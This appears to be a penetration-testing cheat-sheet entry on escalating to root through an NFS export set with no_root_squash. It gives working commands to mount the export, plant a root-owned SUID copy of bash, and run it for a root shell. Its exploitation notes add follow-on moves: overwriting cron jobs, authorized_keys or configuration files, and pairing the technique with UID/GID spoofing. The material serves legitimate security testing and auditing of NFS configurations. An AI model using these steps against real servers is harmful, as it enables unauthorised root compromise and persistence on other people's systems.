By default NFS squashes a remote root to nobody, but an export set with no_root_squash trusts a client's root as root on the server's files. A client that mounts such an export as its own root can create root-owned files on it, including a SUID-root binary, which then runs with root privileges on the server (or on any host that mounts the same export), turning file-share access into code execution as root.
# Mount the no_root_squash export as local root
mount -t nfs <target>:/export /mnt/nfs
# Plant a root-owned SUID shell on the export
cp /bin/bash /mnt/nfs/rootbash && chown root:root /mnt/nfs/rootbash && chmod 4755 /mnt/nfs/rootbash
# On the server (or any host mounting it), run it to get root
/export/rootbash -p
Exploitation notes#
- The SUID technique needs a foothold on a host that executes files from the export; on the server itself this is local root.
- Even without execution,
no_root_squashplus write is an arbitrary root file write: overwrite a cron job, authorized_keys, or a config. - It pairs with UID and GID spoofing when you need to act as a specific non-root user instead.